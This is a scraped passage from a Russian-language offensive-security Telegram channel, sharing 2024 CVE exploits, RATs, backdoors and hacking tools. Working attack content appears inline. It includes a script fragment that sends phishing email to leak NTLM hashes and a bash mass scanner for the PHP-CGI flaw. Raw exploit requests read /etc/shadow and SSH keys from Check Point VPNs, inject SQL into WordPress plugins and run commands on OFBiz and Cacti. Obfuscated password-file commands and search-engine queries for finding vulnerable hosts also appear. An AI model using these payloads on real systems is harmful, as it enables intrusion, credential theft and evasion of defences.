docs</a></p> </body> </html>""" msg.attach(MIMEText(html_content, 'html')) # Connect to SMTP server and send email with smtplib.SMTP('smtp-mail.outlook.com', 587) as server: server.starttls() server.login(sender_email, sender_password) server.send_message(msg) print("Email sent successfully.")if __name__ == "__main__": send_email()Но есть пара НО:1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на rtf например)2. На линк жертве кликать не нужно, Office Protected View все сам сделает.3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока port established#outглюк #ntlm2
2024-07-28 09:55:14
Пишем stealer logs parser*WriteUp*SourceCode (template) Images
2024-07-28 04:35:32
Certified Ethical Hacker (CEH) v11*38 GB*download Images
2024-07-27 05:18:46
Malware Development*Part I - Analysis and DFIR SeriesPart II - Analysis and DFIR SeriesPart III - Analysis and DFIR SeriesPart IV - Analysis and DFIR Series#malware Images
2024-07-26 20:32:55
BreachForum Party !!!В программе:Канье Уэст и агенты FBIBugBounty с паяльникомРяженные cisco talosИ мерч в полоскуВы приходите😆#breachforum Images
2024-07-26 19:00:27
Xeno Rat*Опенсорсный РАТник, написан на C# и совместим с Windows 10, 11*Крыса умеет:HVNCLive Microphoneand cameraSocks5 Reverse ProxyRegular Updates and Much More (ну тут сомнительно)Built Completely from Scratch (скорее минус чем плюс)UAC bypass (хммм)Fun menu (праздник для души и мёд для ушей)ну и куча всегоdownload крысу#RAT #funny Images
2024-07-26 05:06:09
eBPF based kernel backdoor*Снифинг ssh/sudo/su/login/passwd сессий*download#ebpf #linux Images
2024-07-25 21:08:34
Поздравляем с днем системного администратора 2024*и смотрим классику 😏#sysadminDAY
2024-07-25 11:48:52
Плащ невидимка для linux процессов*В программе:Аномальное монтированиеПустые каталоги в которых есть жизньЗаплывы с sTraceФорензика одной ладошкой*Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic#redteam #linux #proc Images
2024-07-24 18:57:04
Linux Shellcoding*Избегайте нулевых байтов \\x00 в шеллкодесах !!!*Щелкнуть орешек знаний тут#linux #redteam Images
2024-07-23 20:53:59
PumpBin*Собирайте offensive имплатны, шаблоны, подгружайте в свои C2\C&CНо помните, ровно в полночь - дадут бинарём в тыкву*Скачать тут*Документация тут🎃 Images
2024-07-23 15:36:27
CVE-2024-41107*Apache CloudStack *Версии с 4.5.0 по 4.18.2.1 и с 4.19.0.0 по 4.19.0.2.*Дырка в механизме аутентификации SAML*Для админов\white: saml2.enabled заменить на saml2.false бгг))#apache #saml
2024-07-23 13:04:17
СVE-2024-39907CVSS 9.8 Ошибка SQLi подвергает пользователей 1Panel удаленному захвату*POC exploit*FOFA Query: icon_hash="1300107149" || icon_hash="1453309674" || http://cert.issuer.cn="1Panel Intermediate CA"FOFA Link: пыщь#1panel #china Images
2024-07-22 19:45:53
Meta LLaMA 3.1 Нейроночка*764GiB после распаковки~820GBmagnet:?xt=urn:btih:c0e342ae5677582f92c52d8019cc32e1f86f1d83&dn=miqu-2&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80* Images
2024-07-22 03:33:20
CVE-2024-40348*Bazaar < v1.4.3 обход каталога*POC+scanner* Images
2024-07-18 22:22:48
берегите котиков*#bilet
2024-07-17 07:52:22
Havoc C2 Teamserver SSRF exploit *Exploit#CC #C2 #havoc #hackBYhack
2024-07-17 07:37:03
ThinkPad Hardware hacking to bypass BIOS passwords*Read#hardware #bios Images
2024-07-16 18:42:05
IHxExec*POC для выполнения произвольного кода от имени другого пользователя*download Images
2024-07-16 16:04:26
CVE-2024-41003*Linux Kernel: Vulnerability in the eBPF verifier register limit tracking#kernel Images
2024-07-14 20:54:47
Viva España2:1Прекрасный матч !!! Images
2024-07-14 06:33:15
CVE-2024-29824*Ivanti EPM - Remote Code Execution*Mass exploit Images
2024-07-14 06:18:16
pdf exploit*Создать свой#CVE-2024-4367 #pdf
2024-07-13 21:33:05
CVE-2024-34102*Adobe CommerceВерсии: 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8XXE vuln *Exploit Images
2024-07-13 05:15:50
Просыпаемся, завтракаем*CVE-2024-5522 WordPress HTML5 Video Player SQLi*usage:GET /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -
2024-07-12 20:13:03
Exploiting Enterprise Backup Software For Privilege Escalation*часть перваячасть вторая*#LPE #interprise #research Images
2024-07-12 08:25:31
По поводу youtube*Пошел проверять, 4К прекрасно гоняется без тормозов.Я и не сразу то понял почему 👌Ну если по офф версии на территории РФ стоит старое оборудование googleкоторое не обновляется, а трафф вырос.Что мешает обходиться это узкое место ? Ответ: ничего.Поставьте себе vpn (только не быдло wireguard и даже не православный openvpn, а что то современное, типа xtls). клиенты есть под любую платформу: unix/linux/windows/android/appleИ будет вам счастье.Бонус трэк: конспирологическая версияПодумалось, тут же наши выкатили аналог тытрубы - "Платформа", но нас уже палкой от youtube отгонишь, вот и зарезали траффик ))) Images
2024-07-12 05:30:36
CVE-2024-39202 D-Link DIR-823X*RCE*writeup*POC exploit Images
2024-07-11 17:05:32
Самый серьезный российский хакер bratva известный своими комментариями про киберпреступления(например LockBit ransomware: операция Cronos, его постили даже западные СМИ) поделился каналом про кибербезопасность который он читает с удовольствием:https://t.me/knightpentest Images
2024-07-11 11:59:50
MSSQL ATTACK TOOL - pentesting MSSQL servers*writeUP*download#tools #mssql Images
2024-07-10 11:58:03
СVE-2024-37081 VMware vCenter*Уязвимость в неправильной конфигурацией /etc/sudoers, позволяет сохранять опасные переменные среды при выполнении команд sudo.*POC exploit#vmware
2024-07-10 09:43:35
CVE-2024-38094 / CVE-2024-38024 / CVE-2024-38023*Microsoft SharePoint RCE*VIDEO*POC exploit Images
2024-07-09 08:15:42
CVE-2024-5009 *Progress WhatsUp Gold SetAdminPassword Privilege Escalation*POC Images
2024-07-09 04:45:45
HEVD Exploit Windows 10 22H2 *LPE exploit
2024-07-06 18:04:08
главное что быстро, однострочник*curl -s 'https://crt.sh/?q=cia.gov&output=json' --compressed -H 'User-Agent: Mozilla/5.0'|jq -r '.[].common_name,.[].name_value'|sort -u Images
2024-07-06 05:49:33
CVE-2024-36991*Splunk /etc/passwd*exploit Images
2024-07-05 14:53:06
CVE-2024-36401*RCE GeoServer *exploit Images
2024-07-05 14:47:35
1 миллион дорков*download Images
2024-07-04 23:08:23
eBPF rootkit memory forensics*link Images
2024-07-03 19:30:16
и блять чоидитеоткройтетем более что ее нет Images
2024-07-02 22:00:38
FreeBSD это вам не просто OS, это круто и стильно, а те кто вам говорит что там нет docker, просто не умеет в jail\зонирование и вот это вот все.Кто написал всем известный OpenSSH ? хакеры из OpenBSD ! Почему в BSD нет прогремевшей CVE-2024-6387 ? glib да, но может там стабильность любят )))*Не для кого не секрет, что доля рынка BSD, за последние 15 лет серьезно упала,*НО списывать рано.*Во славу систем журнал читать тутFreeBSD #OpenBSD #NetBSD #dragonFlyBSD #тычиBSD Images
2024-07-01 20:24:10
CVE-2024-28955 Automated Path Traversal & Local File Read*POC exploit#poc #path Images
2024-07-01 20:06:40
Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:Первая серия материалов - "Введение в OSINT": • Введение в OSINT • Стороны, заинтересованные в OSINT информации • Типы сбора информации • Преимущества и проблемы OSINT • Правовые и этические ограничения • Цифровой след • Google DorkingВторая серия материалов - "OSINT инструменты": • Хакерские поисковые системы. • OSINT на платформе Telegram. • OSINT: theHarvester и HaveIbeenPwned. • OSINT: Snoop, GHunt, ReconSpider. • OSINT: Поиск по фото. • Инструменты для OSINT в VKontakte и YouTube. • OSINT: Отслеживание транспортаНе забывайте делиться нашим бесплатным курсом "OSINT для новичков"!P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас: • OSINT подборка №1 • OSINT подборка №2 • OSINT подборка №3P.P.S.: Ещё немного полезного по теме OSINT: • OSINT collection. • Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц. • Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел. • Как «пробить» человека в Интернете: используем операторы Google и логику • Red Team Trickery. • История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.#OSINT #обучениеOSINT #статьяLH | Новости | Курсы | Мемы Images
2024-07-01 11:22:56
CVE-2024-6387: Критическая уязвимость OpenSSH без аутентификации RCE «regreSSHion»*Почитать*
2024-06-29 05:49:18
Дожил. До всех Images
2024-06-28 12:30:51
CVE-2024-29943*Ошибка JIT Pwn2Own SpiderMonkey*POC exploit
2024-06-23 13:17:07
+
2024-06-21 10:30:43
CVE-2024-30270*Дырка в почтовом сервере с открытым исходным кодом Mailcow.CVSS: 6,7Связана с обходом пути, затрагивая функцию rspamd_maps(), которая может привести к выполнению произвольных команд на сервере, позволяя злоумышленнику перезаписать любой файл.*exploit#mail Images
2024-06-21 05:22:47
CVE-2024-4577 PHP CGI Remote Code Execution *writeUPдля версий:PHP 8.3 < 8.3.8PHP 8.2 < 8.2.20PHP 8.1 < 8.1.29*POC#php #rce
2024-06-21 04:46:03
CVE-2024-29973 Unauth inject Zyxel NAS*SHODAN: http.title:"Zyxel NAS326"FOFA: app="NAS542" || app="ZYXEL-NAS326"*exploit#nas #zyxel Images
2024-06-20 07:22:04
CVE 2024 0044*Дырка в Android 12 и 13. Уязвимость позволяет злоумышленнику выполнить атаку «запуск от имени любого приложения», что приводит к локальное повышение привилегий без вмешательства пользователя*exploit#android Images
2024-06-19 23:06:11
Gimmick*Section-based payload obfuscation technique for x64 *download Images
2024-06-19 17:16:10
Не ну, why not ?)я так понимаю docker RCECVSS Score: 146 % Images Images
2024-06-19 17:07:44
CVE-2024-28397 js2py sandbox escape, bypass pyimport restriction*POC + fix#python #js #poc Images
2024-06-19 07:55:32
CVE-2024-34470 HSC MailInspector*POC:GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwdFOFA:title=="..:: HSC MailInspector ::.." Images
2024-06-18 08:41:20
Вчера на ночь глядя стукнула мысль, как бы реализовать редирект юзера в зависимости от правильно\неправильно был дан ответ на http basic authentication (который на nginx).Ну то есть если логин\пароль верный - отправило на правильный сайт.логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.Добрый гугл сказать соединить nginx + LUA. После слова Lua я про первую мысль как то подзабыл.Варианта три:1 - собрать руками джинс + луа2 - докер3 - OpenRestyСам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.Как минимум можно получать webshell просто описав vhost (самый обычный nginx + пара строк на Lua) ну или получать полноценный lua cliОказвается нормальные пацаны уже сделали, гит ломится от решений.Почитайте короткую статейку )Backdooring OpenResty Servers#ЯбудуЗватьТебяЛУ #nginx Images
2024-06-18 08:05:46
BYPASScat ${HOME:0:1}etc${HOME:0:1}passwd`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwdcat `xxd -r -ps <(echo 2f6574632f706173737764)` Images
2024-06-18 06:45:12
How To Harden Active Directory To Prevent Cyber AttacksВебинарPDFНе поленитесь открыть PDF, можно даже не читать, картинки ТОП.#ad #sec Images
2024-06-17 15:18:58
None
2024-06-17 15:18:57
CVE-2024-30078 win RCE wi-fi*New Wi-Fi Takeover Attack—All Windows Users*И Вроде сплоит какой то странный, но зачем тогда репу удалять ? ))#win #rce
2024-06-07 17:35:40
DDOS для самых маленьких#pic
2024-06-07 16:32:04
CVE-2024-4577 Argument Injection in PHP-CGIДОПОЛНЕНИЕ к предыдущему постуBASH:#!/bin/bash# Function to check vulnerability for a domaincheck_vulnerability() { local domain=$1 local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \ -H "User-Agent: curl/8.3.0" \ -H "Accept: */*" \ -H "Content-Length: 23" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Connection: keep-alive" \ --data "<?php phpinfo(); ?>" \ --max-time 10) if [[ $response == *"PHP Version"* ]]; then echo "$domain: Vulnerable" fi}# Main function to iterate over domainsmain() { local file=$1 while IFS= read -r domain || [ -n "$domain" ]; do check_vulnerability "$domain" done < "$file"}# Check if the file argument is providedif [ "$#" -ne 1 ]; then echo "Usage: $0 <domain_list_file>" exit 1fi# Call the main function with the domain list filemain "$1"*Сохраняйте скрипт и по списку доменов:./CVE-2024-4577_script.sh /path/to/domains-list#php #xamp
2024-06-07 08:14:16
CVE-2024-4577 Argument Injection in PHP-CGI*При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.*fofa link (610,604 хостов)#php #xamp Images
2024-06-06 16:01:09
Proxy Bar pinned a photo
2024-06-06 16:00:59
CVE-2024-27348 RCE в Apache HugeGraph Server*Usage:python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"*POC exploit#apache #rce
2024-06-06 15:57:25
CVE-2024-27822 macOS PackageKit*LPE*Для версий: macOS 14.5 Beta 1 (23F5049f) and older macOS 13.6.6 (22G630) and older macOS 12.7.4 (21H1123) and older Any version of macOS 11 or older*writeUp*exploit#macos #lpe
2024-06-06 05:31:15
CVE-2024-36801 SemСms*sql injection для версии Semcms v 4.8*SQLi + POC Images
2024-06-05 15:32:23
Вышел PagedOut Июнь 2024*почитать PDF#ezine #hacking #tricks #coding Images
2024-06-05 11:11:42
Unlock Docker (Россия, Куба, Иран, Судан, Сирия, КимЧенЫновка)*BASH script*#dogger Images
2024-06-05 08:47:26
CVE-2024-5326 WordPress *Post Grid Gutenberg и плагин PostX = 4.1.2User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.*POC exploit#wordpress #exploit
2024-06-04 04:57:22
CVE-2024-21512 MySQL2*Дырка в библиотеке MySQL для Node.js*POC#mysql Images
2024-05-31 21:31:38
Доброй ночи.Написал небольшую книжку\руководство для начинающих взломщиков Linux.Сей труд навеян вечным вопросом "Подскажите с чего начать?".На какую то уникальность не претендую, но надеюсь кому то окажется полезным.За вычитку благодарю uberhahnНу и с первым днем лета и днем защиты детей )Само руководство book.proxy-bar.org#book #linux #hex Images
2024-05-31 15:14:51
fuck yeah !*ansible-havoc*Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL*download#C2 #ansible Images
2024-05-30 11:42:02
CVE-2024-24919 Check Point Remote Access VPN 0-DayНу или так 👌aCSHELL/../../../../../../../home/admin/.ssh/id_rsa*ssh admin@Хостъ -i id_rsa#shitPointVPN #0Day Images
2024-05-30 08:23:00
CVE-2024-24919*Check Point Remote Access VPN 0-Day*FOFA link*POC:POST /clients/MyCRL HTTP/1.1Host: <redacted>Content-Length: 39aCSHELL/../../../../../../../etc/shadow#0day #checkpoint Images
2024-05-30 05:22:16
RWX_MEMEORY_HUNT_AND_INJECTION_DV*OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX)*link
2024-05-29 11:09:43
CVE-2024-27842 + CVE-2023-40404 macOS*Сплоит позволяет выполнять код на уровне ядра*POC exploit (для CVE-2024-27842)POC exploit (для CVE-2023-40404)#macos
2024-05-27 19:10:32
CVE-2024-2961 - тихоходка 2*Переполнение буфера в glibc's iconv*Exploit + POC 👌#yammy
2024-05-27 14:16:10
CVE-2024-2961 - тихоходка*Помните месяц назад был кипишь, относительно того что нашли дырку в glibc. Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.Ну так вот, на сцену вползает Iconv со своим RCE.*Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961*ЧитаемIconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine Images
2024-05-27 08:14:54
Linux Kernel Teaching. Laboratory*Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux.Лабораторки сделаны в стиле инструкций.Будет полезно: админам, драйверописателям и руткитоварам*Link#linux #kernel Images
2024-05-26 04:54:39
Образовательные мультики по воскресеньям !*Едим сырник, пьем кофе, смотрим мультики*Как работает нашумевший бэкдор XZUtils SSHD.#XZ #мультики
2024-05-25 16:00:12
Трансмутация вредоносного ПО - Раскрытие скрытых следов кровавой алхимии.*Интересный writeup.Рассматривается анализ вредоносного ПО под названием «BloodAlchemy», которое наблюдали в ходе атаки.В октябре 2023 года BloodAlchemy была названа Elastic Security Lab 1 новым RATником. Однако расследование показало, что BloodAlchemy — это НЕ совершенно новая вредоносная программа, а развитая версия Deed RAT, преемника ShadowPad.*Link#malware #rat Images
2024-05-25 14:58:04
EDRaser*Тулза для удаленного удаления:журналов доступажурналов событий Windowsбаз данныхдругих файлов на удаленных компьютерах. два режима работы: автоматический и ручной.*link*Напримерpython edraser.py --attack windows_event_log --ip 192.168.1.133
2024-05-23 20:16:45
Фанатам крэкнутого BurpSuite Pro чутка напрячьсяв одной из сборок найдет стиллер#сыр800 Images
2024-05-23 19:38:00
Интересный способ отключить Windows Defender. (через API WSC)*NoDefender#win #defender Images
2024-05-23 10:37:49
Поиск, анализ и использование переполнения буфера стека в подсистеме netfilter из контекста softirq.*Часть 01Часть 02 #netfilter #linux Images
2024-05-23 05:32:45
CVE-2024-21683Confluence Data Center and Server RCE*POC - 3 вариата#Jirka Images
2024-05-21 13:08:59
Отличный WriteUpt по теме SIM Hijacking*Link#sim Images
2024-05-19 19:18:07
Интересный и подробный writeUp о том, как юзать уязвимость записи за пределами доступа в FortiGate SSL VPN.*Link Images
2024-05-19 17:07:31
CVE-2024-32002 GIT RCE*Удаленное выполнение кода в подмодулях Git.Payload может быть активирован через рекурсивное клонирование репозитория Git.*POC exploit#git #rce
2024-05-19 06:04:55
Образовательные мультики по воскресеньям !Берем сырники, кофе, смотрим*Функции аутентификации в LSASS. Это дает атакующему главный пароль без изменения паролей пользователей.#мультики #LSASS
2024-05-18 14:08:35
Подведем итоги нашего бесплатного курса "Linux для новичков". Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux. В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.Неделя 1: Введение в Linux • Что такое Linux и почему его выбирают? • Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др. • Установка Linux: дуализм с Windows, LiveCD и виртуальные машины. • Основные команды командной строки Linux: cd, ls, mkdir, rm и др. • Структура файловой системы Linux: /bin, /etc, /home и др. • Пакетный менеджер APT для установки и обновления программ. • Основы текстового редактора nano: открытие, редактирование и сохранение файлов.Неделя 2: Работа с файлами и директориями • Основные команды для работы с файлами и директориями: cp, mv, rm и др. • Работа с архивами в Linux: создание, разархивирование, просмотр. • Поиск файлов и содержимого в Linux: команды find и grep. • Управление правами доступа к файлам и директориям в Linux: chmod и chown. • Символьные и жесткие ссылки: создание и использование. • Управление процессами и задачами в Linux: команды ps, top, kill и др. • Автоматическое выполнение задач с помощью cron.Неделя 3: Управление пользователями и группами • Создание и удаление пользователей в Linux: команды useradd и userdel. • Управление паролями пользователей: команда passwd. • Назначение пользователей в группы: команда usermod. • Создание и удаление групп в Linux: команды groupadd и groupdel. • Управление правами доступа к файлам и директориям для пользователей и групп. • Просмотр информации о пользователях и группах: команды id, whoami и др. • Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.Неделя 4: Сетевые возможности Linux • Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза. • Проверка сетевого подключения: команда ping. • Конфигурация сетевых интерфейсов: команды ifconfig и ip. • Работа с удаленными хостами через SSH: подключение, передача файлов. • Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf. • Настройка файрвола в Linux: команда iptables. • Основы настройки и использования сетевых служб в Linux: FTP, Samba и др. • Основы настройки и использования сетевых служб в Linux: Apache.Неделя 5: Мониторинг, журналирование, проверка безопасности. • Лог файлы системы Linux • Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux. • Анализ лог-файлов: команды grep, awk, sed. • Настройка системы мониторинга и аудита: утилиты auditd, nmon. • Система мониторинга Zabbix • Мониторинг сети с помощью tcpdump • Проверка безопасности системы с помощью LinPEASНеделя 6: Работа с данными и дисками в Linux • Использование утилиты rsync для синхронизации данных. • Основы языка сценариев Bash: переменные, условия, циклы. • Создание и выполнение сценариев Bash: утилита bash. • Работа с образами дисков: команды dd, ddrescue. • Восстановление данных с помощью LiveCD. • Создание и настройка RAID-массивов для защиты данных. • Дефрагментация диска LinuxНеделя7: Туннелирование трафика • Установка и настройка OpenVPN сервера на Ubuntu • Простая настройка WireGuard Linux. • Настройка Shadowsocks. • Pivoting: Chisel • SSH туннели • Проксирование трафика с помощью proxychains • Pivoting: Lugolo-ngНеделя 8: Полезные инструменты для взлома • nmap 1 часть • nmap 2 часть • nmap 3 часть • crackmapexec • metasploit • Burp Suite • sqlmapНе забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!#Linux #обучениеlinux #статьипоLinuxLH | Новости | Курсы | Мемы
2024-05-18 05:51:13
CVE-2024-22120 Zabbix Server *Time Based SQL Injection*Тех детали*exploit#zabbix Images
2024-05-18 03:53:08
CVE-2024-32640*detection & Exploitation SQLi in Mura/Masa CMS*POC exploit Images
2024-05-17 11:14:33
CVE-2024-27130* RCE on a vulnerable QNAP device.*POC exploit
2024-05-17 07:36:29
CVE-2024-33551Уязвимость SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress. Уязвимость позволяет команды SQL в базе данных.*POCPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: keep-aliveUpgrade-Insecure-Requests: 1#wordpress #sql
2024-05-16 03:49:49
CVE-2024-32113 Apache-OFBiz*POC для WINPOST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml<?xml version="1.0"?><methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params></methodCall>POC для *NIXPOST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml<?xml version="1.0"?><methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params></methodCall>
2024-05-15 14:42:52
CVE-2024-22026 *Ivanti EPMM "MobileIron Core" *exploit Images
2024-05-15 04:15:58
CVE-2024-27804 уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра. *POC exploit#IOS #MAC #kernel Images
2024-05-14 21:00:58
cve-2024-27956*WordPress Auto Admin Account Creation and Reverse Shell.*Дырка в плагине wp-automatic для выполнения SQL-запросов.#wordpress
2024-05-14 20:52:41
None
2024-05-14 20:52:40
UAF of wasm memory buffer due to mismatch of cached memory in graph-builder-interface in function ReloadInstanceCacheIntoSsa.*POC + exploit + video
2024-05-14 15:28:25
CVE-2024-29895 cacti*Command injection in cmd_realtime.php *fofa link* usage:http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1#net Images
2024-05-10 17:56:54
И норм
2024-05-10 17:56:40
None Images
2024-05-10 14:49:03
чобы съесть чтобы изжога прошла
2024-05-10 14:47:49
это наверно лишнее
2024-05-10 14:46:36
прикольно
2024-05-10 14:46:27
прислали из прошлой жизни ))))))
2024-05-10 14:46:02
ахуеть
2024-05-09 20:41:21
Круто же
2024-05-09 20:41:14
None Images
2024-05-09 05:03:03
VPN*Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как NordVPN или ExpressVPN. *Читаем ТУТ*Большой список VPN exit NODE#vpn #detect Images
2024-05-08 18:54:00
Тут и сказать то нечего, было )))Со звуком !#Old
2024-05-08 09:46:31
Сдаем экзамен по Sliver C2 framework с легкостью бабочки ))*Lets go#sliver Images
2024-05-08 04:57:09
CVE-2024-26925 Linux LPE*Опять nf_tableskernel 6.5 - 6.9-rc3Эксплоит будет в паблике 24 маяА пока подробности тут#linux #lpe Images
2024-05-08 04:48:25
Инструмент для чтения контрольных вопросов и ответов.Это возможно с помощью SamQueryInformationUser(UserResetInformation).*ReadResetData.c #win Images
2024-05-07 14:11:59
Active Directory Hardening Series*Part 1 – Disabling NTLMv1Part 2 – Removing SMBv1Part 3 – Enforcing LDAP SigningPart 4 – Enforcing AES for Kerberos#AD Images
2024-05-06 20:18:22
спать #modesleep
2024-05-06 17:10:02
Linksys routers POCs*CVE-2024-33788 - POC exploitCVE-2024-33789 - POC exploit
2024-05-06 12:06:04
слишком жирно)))*http://164.68.102.223/* Images
2024-05-06 07:59:46
Microsoft Activation Scripts (MAS)*Latest Version: 2.6Release date: 20-Apr-2024*download MASdownload windows ALL version + server + office#win Images Images
2024-05-05 10:37:28
Ну да, у нас там адрес ЧАТа сменился#chat #/usr/bin/chat Images
2024-05-05 04:51:07
iPhone с Touch ID + хомячина ID*Так, то есть, теперь еще и хомяка покупать? #госуслуги #хомяки
2024-05-05 04:40:04
systemd run tty*Очень хорошо !#terminal #systemD #lol Images
2024-05-05 04:33:59
Horacius (IAM) - Local privilege escalation, без учетной записи Windows.*CVE-2024-29417*Интересное, почитать Images
2024-04-30 08:08:18
Ппипец
2024-04-30 07:36:34
None Images
2024-04-30 07:23:12
Жду
2024-04-30 07:23:06
None Images
2024-04-27 11:04:59
CVE-2024-21345 Windows Kernel EoP*WriteUp*exploit#win #poc Images
2024-04-27 04:38:19
Доброго утраCVE-2024-26218 Windows Kernel Elevation of Privilege Vulnerability*Proof-of-Concept#win #lpe
2024-04-26 20:15:32
Подтасовка результатов голосования: киберугрозы глобальным выборам. (лол что?))*Ребята из Mandiant выкатили занятный доклад "Poll Vaulting: Cyber Threats to Global Elections".Доклад интересен тем, что там очень смело составлены:* Действующие лица* Государства (РФ, Китай, Иран, Корея- та что с забавным толстым лидером)* Организации* Спецслужбы* Хактивисты* И тд—На главные роли почему то взяли: DDoS, кражу данных, и дикпик дипфейки с AI.На вторых ролях поинтереснее.*Приятного чтиваPoll Vaulting: Cyber Threats to Global Elections#подозрительные_лица Images
2024-04-26 17:30:52
Google Captcha Bypass*download#google #captcha #пятницИгавно
2024-04-26 08:17:56
CVE-2023-20198 RCE CISCO IOS XE*Добавления/удаления пользователей и выполнения команд/системных команд cisco cli.*Список целей тут*exploit#cisco #rce Images
2024-04-25 09:20:38
Топ платформ для обучения и тренировки навыкам кибербезопасности и этичного хакинга#подборкаС каждым днем, цифровая безопасность становится одной из наиболее приоритетных задач для организаций и частных лиц. Каждый день появляются новые угрозы, требующие постоянного повышения уровня защиты и знаний, для их предотвращения. И лучше всего это делать на практике. Мы подготовили подборку обучающих платформ которые могут быть полезны как представителям «синих», так и «красных» команд.• Attack-Defense: Платформа для практики в области информационной безопасности с более чем 1800 лабораторными работами.• Alert to win: Учебная платформа, предлагающая задачи на выполнение кода JavaScript для обучения векторам XSS атак.• CryptoHack: Платформа для изучения криптографии через решение задач и взлом небезопасного кода.• CMD Challenge: Серия испытаний, предназначенных для проверки ваших навыков работы с командной строкой.• Exploitation Education: Платформа с ресурсами для обучения методам эксплуатации уязвимостей.• HackTheBox: Платформа для тестирования и улучшения навыков взлома и пентестинга.• Hackthis: Сайт, предлагающий различные испытания для хакеров для тестирования и развития их навыков.• Hacker101: Платформа CTF от HackerOne, предназначенная для обучения основам взлома и пентестинга.• Hacking-Lab: Платформа для обучения и соревнований в области кибербезопасности.• OverTheWire: Серия варгеймов, предназначенных для обучения навыкам информационной безопасности.• PentesterLab: Ресурс для обучения пентестингу и поиску уязвимостей через практические упражнения.• Hackaflag BR: Бразильская платформа для соревнований по кибербезопасности.• PentestIT LAB: Виртуальная лаборатория для практики взлома и пентестинга.• PicoCTF: Платформа соревнований по информационной безопасности, ориентированная на студентов.• Root-Me: Платформа для всех, кто хочет улучшить свои навыки в области кибербезопасности через практические задачи.• The Cryptopals Crypto Challenges: Набор задач, разработанных для обучения прикладной криптографии.• Try Hack Me: Платформа для изучения кибербезопасности через интерактивные упражнения.• Vulnhub: Ресурс для обучения пентестингу и взлому через практику на виртуальных машинах.• W3Challs: Платформа для веб-разработчиков и пентестеров для тестирования и улучшения своих навыков.• WeChall: Сайт для обучения и практики навыков в области информационной безопасности через участие в различных вызовах и заданиях.• LetsDefend: Платформа для обучения сетевой защите и реагированию на инциденты.• Vulnmachines: Платформа предлагает различные VM для практики навыков взлома и пентестинга.• Rangeforce: Образовательная платформа для обучения кибербезопасности с помощью симуляций и модулей обучения.• Pwn College: Образовательная инициатива, направленная на обучение 